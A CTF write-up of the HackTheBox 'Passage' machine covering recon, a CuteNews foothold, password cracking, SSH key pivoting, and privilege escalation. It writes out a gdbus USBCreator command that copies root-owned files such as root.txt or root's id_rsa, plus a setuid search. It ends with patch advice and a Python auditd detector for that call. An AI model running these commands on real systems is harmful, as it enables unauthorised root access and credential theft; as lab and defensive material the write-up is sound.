Hackthebox Passage Writeup

Jim Solomon
Mar 6, 2021

Overview:

Passage is a medium-level Linux machine on Hackthebox. It comes with a vulnerable CuteNews web server: a public exploit gets you onto the machine, and cracking some hashes found in the CuteNews user folder yields user credentials that let you log in as other users. Finally, there is a vulnerable dbus service running under user nadav, which you can exploit to get the root flag or root’s id_rsa. With all that being said, let’s just jump in!

Reconnaissance:

# Nmap 7.91 scan initiated Fri Jan 29 17:32:54 2021 as: nmap -A -T4 -p- -oN all -v 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

As nmap only shows two ports, I will check the web server on port 80 first.

Checking for CuteNews exploits, I found this recent one.

The Foothold:

Great, we have the foothold! Now, let’s PrivEsc!

Base64-decode all the strings and head over to CrackStation to crack all the passwords.

Use the passwords we just cracked to log in as user Paul.

Found an SSH key for user nadav in Paul’s .ssh directory.

Copy the id_rsa key and log in to nadav’s account over SSH.

PrivEsc to root:

Check for setuid and setgid files as user nadav:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

There is a dbus exploit, and the box’s name also hints at the exploit below; you can read a detailed explanation of it. Now I’m going to try it out.

Run the command below to get the root flag. You can also get root’s id_rsa and use it to log in as root.

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/root.txt true

We can see we got root.txt in the /tmp directory, and it’s 33 characters :)

Patch the vulnerability:

  1. Update the CuteNews application on the web server.
  2. Remove the dbus service from the machine.
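
To spot the gdbus call shown above from the defender's side, the following added example (not part of the original writeup) scans auditd EXECVE records for invocations of com.ubuntu.USBCreator.Image and rates each one by its source path. The log records are constructed, and the watch list (/root/ and .ssh directories) and the presence of execve auditing on the host are assumptions.

```python
import posixpath
import re

METHOD = "com.ubuntu.USBCreator.Image"  # method named in the writeup's gdbus command
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))(?=\s|$)')

def execve_args(record):
    """Rebuild argv from one auditd EXECVE record."""
    args = {}
    for idx, quoted, hexval in ARG_RE.findall(record):
        # auditd hex-encodes arguments that contain spaces or control characters
        args[int(idx)] = bytes.fromhex(hexval).decode("utf-8", "replace") if hexval else quoted
    return [args[i] for i in sorted(args)]

def is_sensitive(path):
    """Assumed watch list: root's home and any .ssh directory; extend per host."""
    p = posixpath.normpath(path)  # collapse ../ segments before matching
    return p.startswith("/root/") or "/.ssh/" in p

def findings(log_text):
    """Return (severity, source, target) for every exec that calls METHOD."""
    out = []
    for line in log_text.splitlines():
        if "type=EXECVE" not in line:
            continue
        argv = execve_args(line)
        if METHOD not in argv:
            continue
        params = argv[argv.index(METHOD) + 1:] + ["", ""]  # source, target, flag
        src, dst = params[0], params[1]
        out.append(("high" if is_sensitive(src) else "review", src, dst))
    return out

# Constructed sample records (not captured from the box).
_HEX = "/home/nadav/my image.iso".encode().hex().upper()
_CALL = ('a0="gdbus" a1="call" a2="--system" a3="--dest" a4="com.ubuntu.USBCreator" '
         'a5="--object-path" a6="/com/ubuntu/USBCreator" a7="--method" a8="' + METHOD + '"')
SAMPLE_LOG = "\n".join([
    'type=EXECVE msg=audit(1611941574.101:811): argc=3 a0="ls" a1="-l" a2="/tmp"',
    f'type=EXECVE msg=audit(1611941580.412:812): argc=12 {_CALL} '
    'a9="/root/root.txt" a10="/tmp/root.txt" a11="true"',
    f'type=EXECVE msg=audit(1611941591.007:813): argc=12 {_CALL} '
    f'a9={_HEX} a10="/dev/sdb" a11="true"',
])

if __name__ == "__main__":
    for sev, src, dst in findings(SAMPLE_LOG):
        print(f"[{sev}] {METHOD}: {src} -> {dst}")
```

Clients that talk to D-Bus without spawning gdbus will not appear in EXECVE records, so treat this as one signal alongside the two fixes listed above.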
